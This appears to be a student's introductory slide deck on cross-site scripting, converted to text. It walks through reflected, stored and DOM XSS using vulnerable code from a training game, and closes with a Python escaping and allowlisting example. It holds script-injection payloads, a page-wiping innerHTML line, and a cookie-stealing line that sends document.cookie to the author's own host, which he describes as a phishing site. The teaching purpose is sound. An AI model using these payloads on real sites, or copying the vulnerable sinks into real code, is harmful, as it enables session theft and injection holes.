Fu Jen Catholic University, CSIE year 4 class B – 黃品翰 (halloworld)
blog: blog.halloworldis.me
NISRA core staff, more or less
AIS3 project: rejected twice
AIS3 2019 (Crypto)
AIS3 2020 (Web security)
2020 (ROC year 109) Executive Yuan attacker (攻擊手) program - not selected
榮耀資戰 (general division): no award
FJU Project Lab (II) discipline officer
~~Anyone interested in playing CTF together is welcome~~
Intro
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
<!-- CSS goes here -->
<style>
h1 {
  color: red;
}
p {
  color: blue;
}
</style>
<!-- JavaScript goes here -->
<script>
function clickla() {
  // Replace the paragraph's content with the current date and time
  document.getElementById('demo').innerHTML = Date();
}
</script>
</head>
<!-- HTML goes here -->
<body>
<h1 class="txt">This is a Heading</h1>
<button type="button" onclick="clickla()">Click me to display Date and Time.</button>
<p id="demo">This is a paragraph.</p>
</body>
</html>
Type it straight into the browser console and the JavaScript runs:
a = 0.1 + 0.2
0.30000000000000004
Is a equal to 0.3 ?????
Intro
(Do you think every piece of JS is normal JS?)
document.getElementsByTagName('body')[0].innerHTML=""
Fill in the comment you want
<script>....</script>
Make the user send a malicious request (for example via the URL, or a strange button)
Backend PHP
Insert <script>alert(123)</script>
DOM stands for Document Object Model
To understand the DOM more deeply, see the following article
Stored XSS saves the malicious payload into the server's database
def get(self):
    # Disable the reflected XSS filter for demonstration purposes
    self.response.headers.add_header("X-XSS-Protection", "0")
    if not self.request.get('query'):
        # Show main search page
        self.render_string(page_header + main_page_markup + page_footer)
    else:
        query = self.request.get('query', '[empty]')
        # Our search engine broke, we found no results :-(
        # The untrusted query is concatenated straight into the markup (reflected XSS)
        message = "Sorry, no results were found for <b>" + query + "</b>."
        message += " <a href='?'>Try again</a>."
        # Display the results page
        self.render_string(page_header + message + page_footer)
    return
function displayPosts() {
  var containerEl = document.getElementById("post-container");
  containerEl.innerHTML = "";
  var posts = DB.getPosts();
  for (var i = 0; i < posts.length; i++) {
    var html = '<table class="message"> <tr> <td valign=top> '
      + '<img src="/static/level2_icon.png"> </td> <td valign=top '
      + ' class="message-container"> <div class="shim"></div>';
    html += '<b>You</b>';
    html += '<span class="date">' + new Date(posts[i].date) + '</span>';
    // The stored message is written through innerHTML without encoding (stored XSS)
    html += "<blockquote>" + posts[i].message + "</blockquote>";
    html += "</td></tr></table>";
    containerEl.innerHTML += html;
  }
}
function chooseTab(num) {
  // Dynamically load the appropriate image.
  var html = "Image " + parseInt(num) + "<br>";
  // num is taken from the URL fragment and placed inside the attribute unencoded (DOM XSS)
  html += "<img src='/static/level3/cloud" + num + ".jpg' />";
  $('#tabContent').html(html);
  window.location.hash = num;
  // Select the current tab
  var tabs = document.querySelectorAll('.tab');
  for (var i = 0; i < tabs.length; i++) {
    if (tabs[i].id == "tab" + parseInt(num)) {
      tabs[i].className = "tab active";
    } else {
      tabs[i].className = "tab";
    }
  }
  // Tell parent we've changed the tab
  top.postMessage(self.location.toString(), "*");
}
timer.html
<body id="level4">
<img src="/static/logos/level4.png" />
<br>
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
<br>
<div id="message">Your timer will execute in {{ timer }} seconds.</div>
</body>
index.html
<body id="level4">
<img src="/static/logos/level4.png" />
<br>
<form action="" method="GET">
<input id="timer" name="timer" value="3">
<input id="button" type="submit" value="Create timer">
</form>
</body>
confirm.html
<body id="level5">
<img src="/static/logos/level5.png" /><br><br>
Thanks for signing up, you will be redirected soon...
<script>
setTimeout(function() { window.location = '{{ next }}'; }, 5000);
</script>
</body>
signup.html
<body id="level5">
<img src="/static/logos/level5.png" /><br><br>
<!-- We're ignoring the email, but the poor user will never know! -->
Enter email: <input id="reader-email" name="email" value="">
<br><br>
<a href="{{ next }}">Next >></a>
</body>
function includeGadget(url) {
  var scriptEl = document.createElement('script');
  // This will totally prevent us from loading evil URLs!
  // (setInnerText is a helper defined elsewhere on the game page)
  if (url.match(/^https?:\/\//)) {
    setInnerText(document.getElementById("log"),
      "Sorry, cannot load a URL containing \"http\".");
    return;
  }
  // Load this awesome gadget
  scriptEl.src = url;
  // Attach the element so the browser fetches and runs the script
  document.head.appendChild(scriptEl);
}
only alert(1) ?
document.location.href = "http://vm.halloworldis.me:8000/" + btoa(document.cookie)
document.location.href = "http://vm.halloworldis.me:8000/" + encodeURI(document.cookie)
http://vm.halloworldis.me:8000/ is my phishing site
document.location.href makes the page navigate there
document.cookie is the current page's cookie
// innerHTML inserts the string as HTML elements
document.getElementById('show_name').innerHTML = name;
// Use innerText instead, which guarantees the value is treated as plain text
document.getElementById('show_name').innerText = name;
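As an added example (not code from these slides or from the XSS game), here is the server-side counterpart of the innerText rule for the level 1 and level 3 sinks shown above, in Python: the vulnerable string building next to a hardened version. The function names and sample inputs are my own constructions.

```python
import html
import re

# Constructed sample inputs (hypothetical, not taken from the game server):
# the payload used on the slides, and a non-numeric tab value for the level 3 sink.
SAMPLE_QUERY = "<script>alert(123)</script>"
SAMPLE_BAD_TAB = "1'"


def vulnerable_search_message(query):
    # Same construction as the level 1 handler: untrusted text concatenated
    # straight into the HTML, so a <script> in `query` is reflected verbatim.
    return "Sorry, no results were found for <b>" + query + "</b>."


def safe_search_message(query):
    # Text context: HTML-encode <, >, &, and both quote characters before the
    # value is spliced into the markup. The browser then renders it as text,
    # which is the same effect innerText gives on the client side.
    return ("Sorry, no results were found for <b>"
            + html.escape(query, quote=True) + "</b>.")


def tab_is_allowed(num):
    # The level 3 value lands inside a quoted attribute; the robust fix is an
    # allowlist of what it should ever be (a one- or two-digit tab number).
    return re.fullmatch(r"[0-9]{1,2}", str(num)) is not None


def safe_tab_html(num):
    # Reject anything outside the allowlist instead of trying to escape it.
    if not tab_is_allowed(num):
        raise ValueError("tab number must be 1-2 digits")
    return "<img src='/static/level3/cloud" + str(num) + ".jpg' />"


def payload_survives(markup, payload):
    # Defender's unit check for an output sink: did the raw payload reach
    # the markup unencoded?
    return payload in markup


if __name__ == "__main__":
    print(vulnerable_search_message(SAMPLE_QUERY))
    print(safe_search_message(SAMPLE_QUERY))
    print(safe_tab_html(3))
```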